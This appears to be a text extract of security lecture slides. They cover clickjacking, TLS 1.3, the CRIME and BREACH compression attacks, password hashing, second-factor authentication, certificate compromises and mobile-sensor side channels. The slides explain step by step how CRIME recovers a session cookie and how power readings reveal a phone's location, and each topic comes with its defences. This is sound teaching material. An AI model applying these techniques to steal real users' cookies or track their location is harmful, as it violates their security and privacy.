  • 70. Clickjacking in the Wild Google search for “clickjacking” returns 342,000 results… this is not a hypothetical threat! Summer 2010: Facebook worm superimposes an invisible iframe over the entire page that links back to the victim's Facebook page § If victim is logged in, automatically recommends link to new friends as soon as the page is clicked on Many clickjacking attacks against Twitter § Users send out tweets against their will slide 70
  • 72. Frame Busting Module 2: Web Background and the Browser Security Model
  • 73. <iframe name=“myframe” src=“http://www.google.com/”> This text is ignored by most browsers. </iframe> Frames Embed HTML documents in other documents
  • 74. Frame Busting Goal: prevent web page from loading in a frame § example: opening login page in a frame will display correct passmark image Frame busting: if (top != self) top.location.href = location.href
  • 75. Better Frame Busting Problem: Javascript OnUnload event Try this instead: <body onUnload="javascript: cause_an_abort;)"> if (top != self) top.location.href = location.href else { … code of page here …}
  • 76. Summary • Web security goals and threat models • HTTP • Rendering: Html, DOM, embedded content, JavaScript • Isolation: frames, same-origin policy, HTML5 sandboxing • Communication: fragment, post-message, cross- origin request • Frame navigation: Same-origin policy, descendant policy • Client storage: Cookies, Local storage, Native Client • Click-jacking, tap-jacking, frame busting
  • 77. TLS 1.3 Compression attacks Password Breaches Certificates on the Web Abusing Mobile Sensors MODULE 3
  • 78. Topics for this section TLS attacks and defenses: Compression attacks: CRIME and BREACH, TLS 1.3 Password breaches and 2nd factor authentication Certificate Authorities: compromises, Lets encrypt, universal TLS New hardware security support: Intel SGX Sensor abuse on mobile phones
  • 79. TLS 1.3 Module 3: Attacks and Defenses
  • 80. Review: TLS 1.2 browser server SK client-hello server-hello + server-cert (PK) key exchange (several options) Finished cert client-key-exchange: E(PK, k) rand. k k HTTP data encrypted with KDF(k) most common: server authentication only from CA
  • 81. Review: TLS record encryption (original design) browser server k k plaintext HTTP data 16KB records plaintext integrity tag (MAC) encrypt k hdr ciphertext encryption method is called MAC-then-encrypt : the reason for many attacks on TLS (BEAST, Lucky13, POODLE, … ) why?
  • 82. TLS 1.3: a new version of TLS (2017) Record encryption: • mandatory method: AES128-GCM fast on x86 (AES-NI) : Intel Skylake, 0.68 cycles/byte • On weaker processors: CHACHA20_POLY1305 fast in software Both methods provide authenticated encryption
  • 83. TLS 1.3: a new version of TLS (2017) Session setup: • Forward secrecy required (non-forward secure method is deprecated) • Zero round-trip setup option: client can send encrypted data on first flow (after client-hello) • Server certificate is encrypted (previously, sent in the clear) stronger privacy when server has multiple certificates • Initiate TLS session from a pre-shared secret, if one exists more general than session-resume in TLS 1.2
  • 85. Compression and Encryption Strong desire to combine compression and encryption How? Option 1: first encrypt and then compress Does not work … ciphertext looks like a random string
  • 86. Compression and Encryption Option 2: first compress and then encrypt Used in many Internet protocols (TLS, HTTPS, QUIC, …) POST /bank.com/buy?id=aapl Cookie: uid=JhPL8g69684rksfsdg Recall in TLS: 16KB records Support for compression before encryption
  • 87. Trouble … [Kelsey’02] Compress-then-encrypt reveals information: POST /bank.com/buy?id=aapl Cookie: uid=JhPL8g69684rksfsdg POST /bank.com/buy?id=goog Cookie: uid=JhPL8g69684rksfsdg Second message compresses better than first: network observer can distinguish the two messages!
  • 88. Even worse: the CRIME attack [RD’2012] POST /bank.com/buy?id=aapl Cookie: uid=JhPL8g69684rksfsdg Host: bank.com Javascript Goal: steal user’s bank cookie Javascript can issue requests to Bank, but cannot read Cookie value (simplified)
  • 89. Observe ciphertext size POST /bank.com/buy?uid=A11111… Cookie: uid=J hPL8g69684rksfsdg Host: bank.com 16KB Even worse: the CRIME attack [RD’2012] (simplified)
  • 90. Observe ciphertext size POST /bank.com/buy?uid=B11111… Cookie: uid=J hPL8g69684rksfsdg Host: bank.com 16KB Even worse: the CRIME attack [RD’2012] (simplified)
  • 91. POST /bank.com/buy?uid=J11111… Cookie: uid=J hPL8g69684rksfsdg Host: bank.com 16KB Ciphertext size is slightly shorter ⇒ first character of Cookie is “J” Even worse: the CRIME attack [RD’2012] (simplified)
  • 92. POST /bank.com/buy?uid=Ja1111… Cookie: uid=Jh PL8g69684rksfsdg Host: bank.com 16KB Observe ciphertext size Even worse: the CRIME attack [RD’2012] (simplified)
  • 93. POST /bank.com/buy?uid=Jh1111… Cookie: uid=Jh PL8g69684rksfsdg Host: bank.com 16KB Ciphertext size is slightly shorter ⇒ 2nd character of Cookie is “h” Even worse: the CRIME attack [RD’2012] (simplified)
  • 94. POST /bank.com/buy?uid=Jh1111… Cookie: uid=Jh PL8g69684rksfsdg Host: bank.com 16KB Recover entire cookie after 256 × (len of Cookie) attempts Takes several seconds (simplified) Even worse: the CRIME attack [RD’2012] (simplified)
  • 95. What to do? The problem: Observed ciphertext length reveals compression amount ⇒ reveals plaintext info … no good solution Non-defense: add a random length pad to ciphertext First defense: compression disabled in TLS (and others, e.g., SPDY) Problem: compression also done in HTTP layer ⇒ BREACH attack [PHG’13] … much harder to disable HTTP compression in practice
  • 96. What to do? [PHG’13] Many web sites are impacted … A proposed defense: › Application layer “tags” sensitive data fields in HTTP requests and responses (cookies, PII, etc.) › HTTP-level compression only applied to non-sensitive fields … but not easy to implement
  • 98. A (small) sample of password breaches 2012: Linked-in: 6 million passwords (hashed, unsalted) 2013: Twitter: 250,000 passwords (hashed, salted) Evernote: 50 million records: usernames, emails, hashed passwords Adobe: 38 million records email addrs., password hints, and encrypted passwords 2015: LastPass: stolen email addr., hashed master passwords (and salts) (server-side compromise)
  • 99. Weak password choice Users frequently choose weak passwords: (adobe list, 2013) A common occurrence Example: the Rockyou password list, 2009 (6 most common pwds) 123456, 12345, Password, iloveyou, princess, abc123 List of 360,000,000 words covers about 25% of user passwords Password: 123456 123456789 password adobe123 12345678 qwerty 1234567 Fraction of users: 5% 1.1% 0.9% 0.5% 0.5% 0.5% 0.3% Total: 8.8%
  • 100. How to store passwords First rule of password storage: never store passwords in the clear ! pwA Alice SA H(pwA , SA) Bob SB H(pwB , SB) … … … hash salt id To validate a given password server checks: H(pwA , SA) ≟ StoredHash(Alice) Alice password database
  • 101. How to hash? Linked-in: SHA-1 hashed (unsalted) passwords ⇒ 6 days, 90% of pwds. recovered by exhaustive search The problem: SHA-1 is too fast … attacker can try all words in dictionary To hash passwords: • Use a keyed hash function (e.g., HMAC) where key stored in HSM • In addition: use a slow, space-hard function
  • 102. How to hash? PBKDF2, bcrypt: slow hash functions • Slowness by “iterating” a crypto hash function like SHA256 • Parameterized number of iterations (e.g., set for 1000 evals/sec) Problem: custom hardware (e.g., GPU) can evaluate hash function much faster than a commodity CPU ⇒ attacker can do dictionary attack much faster than 1000 evals/sec.
  • 103. Why is custom hardware faster? only small part of CPU used to hash custom hardware for Bitcoin mining ($1,695) Antminer S7 5.06TH/s Intel Skylake 0 1000 2000 3000 4000 5000 6000 Intel x86 Antminer 93 5060 50x 6 mill 2 mill 4 mill 5 mill 3 mill 1 mill 0
  • 104. How to hash? Scrypt: a slow hash function AND need lots of memory to evaluate ⇒ custom hardware not much faster than commodity CPU Problem: memory access pattern depends on input password ⇒ local attacker can learn memory access pattern for user’s pwd ⇒ eliminates need for memory in an offline dictionary attack Is there a space-hard function where time is independent of pwd? • Pwd hashing competition (2015): Argon2i (also see Balloon hashing)
  • 105. Strengthening User Authentication One option: biometrics: Fingerprints, retina, facial recognition, … Benefit: hard to forget Problems: Biometrics are not generally secret Cannot be changed, unlike passwords Þ Should primarily be used as a second factor authentication note: CCC’13
  • 106. 2nd factor OTP authentication Setup: Choose random key k On device and server: sk = (k,0) Identification: user server r0 ¬ HMAC(k,0) (k,0) (k,0) yes iff r = HMAC(k,0) r1 ¬ HMAC(k,1) (k,1) (k,1) often, time-based updates
  • 107. Google authenticator 6-digit timed one-time passwords (TOTP) [RFC 6238] Wide web-site adoption: Gmail, Dropbox, WordPress, … › Open study: 6.4% Gmail user adoption [EuroSec 2015] To enable TOTP for a user: web site presents QR code with embedded data: otpauth://totp/Example:alice@dropbox.com? secret=JBSWY3DPEHPK3PXP & issuer=Example (Subsequent user logins require user to present TOTP) Danger: password reset upon user lockout
  • 108.
  • 109. Server compromise exposes secrets March 2011: RSA announced servers attacked, secret keys stolen ⇒ enabled SecurID user impersonation Can we do better? Answer: Yes!
  • 110. Duo (also FIDO U2F ) Signature-based challenge response: sk Alice pkA Bob pkB … … pub-key id user database login page pwd 2FA challenge: m Response: sign(sk, m) data verify confirm No secrets on server, simple user experience
  • 111. Certificates on the Web Module 3: Attacks and Defenses
  • 112. Certificate Issuance Woes Wrong issuance: 2011: Comodo and DigiNotar RAs hacked, issue certs for Gmail, Yahoo! Mail 2013: TurkTrust issued cert. for gmail.com (discovered by pinning) 2014: Indian NIC (intermediate CA trusted by the root CA IndiaCCA) issue certs for Google and Yahoo! domains Result: (1) India CCA revoked NIC’s intermediate certificate (2) Chrome restricts India CCA root to only seven Indian domains 2015: MCS (intermediate CA cert issued by CNNIC) issues certs for Google domains Result: current CNNIC root no longer recognized by Chrome ⇒ enables eavesdropping w/o a warning on user’s session
  • 113. Man in the middle attack using rogue cert Attacker proxies data between user and bank. Sees all traffic and can modify data at will. bank attacker ClientHello ClientHello BankCert BadguyCert ServerCert (Bank) ServerCert (rogue) GET https://bank.com SSL key exchange SSL key exchange k1 k1 k2 k2 HTTP data enc with k1 HTTP data enc with k2 (cert for Bank by a valid CA)
  • 114. What to do? (many good ideas) HPKP: HTTP public-key pinning § HTTP header that lets a site declare CAs that can sign its cert Public-Key-Pins: pin- sha256="cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs="; § on subsequent HTTPS, browser rejects certs issued by other CAs § TOFU: Trust on First Use Certificate Transparency (CT): [LL’12] § idea: CA’s must advertise a log of all certs. they issued § Browser will only use a cert if it is on the CT log • Efficient implementation using Merkle hash trees • Companies can scan logs to look for invalid issuance
  • 115. A new CA: Let’s encrypt (letsencrypt.org) A new open Certificate Authority: free certs • Provisioning via an automated agent running on web server Step 1: install agent on web server Step 2: agent proves domain ownership (e.g. bank.com) by DNS record under bank.com or page at fixed URI at bank.com and send Certificate Signing Request (CSR) to CA Step 3: Let’s encrypt CA checks domain ownership if valid, issue cert and sends cert to agent Step 4: agent installs cert on Web server … done 2016: 800K certs issued
  • 116. Abusing Mobile Sensors Module 3: Attacks and Defenses
  • 117. no user permission required Sensors on smart phones Microphone Camera GPS Light sensor Compass MEMS Gyroscope / accelerometer Power meter Barometer Heart rate / oximeter (on smart watches) All have a specific function Can they be abused ??
  • 118. Example 1: fingerprinting Imperfections in camera sensor can be used to link pictures taken by same phone [LG’06] Accelerometer gives a stable device fingerprint [BBMN’14, DRXCN’14] § App. can tell if it has been previously installed on device app device-id
  • 119. Example 2: Gyrophone [MBN’14] Phone gyroscope: measures vibrations (used for games) Trouble: › Gyroscope picks up air vibrations (a.k.a speech) › Sample rate (apps.): 200Hz › Machine learning ⇒ can recognize some speech
  • 120. Example 3: Power usage sensor Modern phones measure power drained from battery Enables apps to optimize power use Repeatedly read: /sys/class/power_supply/battery/voltage_now /sys/class/power_supply/battery/current_now Unrestricted access. Can this be abused?
  • 121. Example 3: Power usage sensor Can this be abused? [MBSN’15] Observation: power used by radio depends on distance and obstacles to cell tower
  • 122. So what? Our work: [MBSN’15] power readings + machine learning ⇒ GPS Why? Routes in a city have unique power fingerprints Three goals: 1. identify route car is taking among a known set of routes 2. identify car’s location along a known route 3. identify car’s route based on a database of pre-measured short segments ✓ ✓ ✓
  • 123. Identify location along known route Main tool: dynamic time warping (DTW) ⇒ Aligns pre-recorded data with current samples
  • 124. Identify location along known route Main tool: dynamic time warping (DTW) ⇒ Aligns pre-recorded data with current samples
  • 125. Lessons Sensors can have unintended consequences There is risk in giving apps direct access to sensors Prevention: • Always require permissions to access sensors • Reduce data from sensors to min needed for utility or only provide abstract view of sensor data
  • 126. Final note: limitations of air gaps A machine holds sensitive date and is isolated from network • If it gets infected, can the malware exfiltrate data? Answer: yes! [Usenix Sec 2015] • Mimic GSM signals using data bus • Use x86 instruction: MOVNTDQ m128, xmm • Effective for 60 feet